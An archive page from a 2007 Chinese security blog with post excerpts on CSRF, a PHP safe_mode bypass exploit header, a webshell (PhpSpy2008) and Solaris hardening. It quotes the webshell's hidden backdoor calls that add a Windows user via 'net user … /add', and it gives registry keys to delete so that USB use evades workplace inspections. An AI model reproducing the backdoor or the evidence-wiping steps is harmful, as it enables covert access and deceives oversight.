2007年12月的文章

CSRF攻击

csrf - Cross-site Request Forgery 字面意思是指跨站点请求伪造,通常用来指 WEB 网站的这一类漏洞,即在某个恶意站点的页面上,促使访问者请求你的网站的某个 URL(通常会用 POST 数据方式),从而达到改变服务器端数据的目的。

看到superhei写了不少相关的文章,这几天刚好遇到。学习学习

http://superhei.blogbus.com

» 阅读全文

关键词: csrf , xss , 攻击 , 入侵

新年愿望

第一:我希望家人,朋友平平安安,健健康康。

第二:希望工作能更上一层楼。

第三:希望2008年咸鱼翻身!努力努!

第四:希望天灾人亡的事件减到最低,也希望世界和平。

第五:希望每一位朋友飞黄腾达。

第六:希望。。。希望,不懂还有什么愿望。。愿大家开开心心。。

079ba6eb

关键词: 2008 , 生活 , 工作

Blog 聚合联盟

blog 聚合联盟

3955.jpg - 大小: 5.66 KB - 尺寸: 322 x 110 - 点击打开新窗口浏览全图

http://www.4sec.org

http://www.4sec.org/?action=post

致力于信息安全技术相关BLOG的信息聚合

关键词: 聚合 , 分享 , rss , blog

SEBUG JS

javascript调用

  1. <script language="javascript" charset="gb2312" src="http://www.sebug.net/js.php"></script>  

sebug_js.jpg - 大小: 5.78 KB - 尺寸: 458 x 44 - 点击打开新窗口浏览全图

参考:http://sebug.net/about/js.html

谢谢angel,谢谢CCTV,谢谢中国共产党

关键词: sebug

USB记录清除方法

有些特殊部门不允许使用移动存储设备,接受检查的时候可以用这招。
删除

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}下的所有项
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB 下所有Vid开头的项
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR 下的所有Disk&Ven开头的项
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\UsbFlags 下所有项
c:\windows\setupapi.log 文件

关键词: 清理记录 , windows , 系统

PHP 5.x COM functions safe_mode and disable_function bypass

//php 5.x COM functions safe_mode and disable_function bypass   
  
//author: shinnai   
//mail: shinnai[at]autistici[dot]org   
//site: http://shinnai.altervista.org   
  
//dork: intitle:phpinfo intext:"php version" +windows (thanks to rgod)   
  
//Tested on xp Pro sp2 full patched, worked both from the cli and on apache   

» 阅读全文

关键词: 漏洞 , php

PhpSpy2008

先看下angel忽悠我的部分源码

  1. makeRequest('<?=$self>','POST','action=shell&execfunc=system&command=net user angel angel /add');  
  2. makeRequest('<?=$self>','POST','action=shell&execfunc=system&command=echo my_name_is_angel > c:\\angel.txt');  
  3. </script> 

太牛X了,还好我先看了下代码,呼呼。估计是跟黑锅学的,这Y的不学好。前几天测试的那个版本还有部分问题,这个版本,基本上是已经很完美了,在MYSQL管理方面是大大的强。

AJAX也比较强,今天才发现他在安全技术中的重要作用了。隐蔽性超级好。什么这主动那主动防御的,在AJAX面前就什么都不是了。

关键词: 后门 , phpspy

Solaris 系统安全加固列表

一、安全理念
1、安全的隐患更多来自于企业内部
2、对于管理员的要求:不要信任任何人
3、分层保护策略:假设某些安全保护层完全失效
4、服务最小化
5、为最坏的情况做打算

二、物理安全
1、记录进出机房的人员名单,考虑安装摄像机
2、审查PROM是否被更换,可以通过记录hostid进行比较
3、每个系统的OpenBoot口令应该不一样,口令方案不可预测
4、系统安装完毕移除CD-ROM
5、将版本介质放入不在本场地的介质储藏室中

» 阅读全文

关键词: sun , solaris , 加固 , 安全

Total: 1212Next ›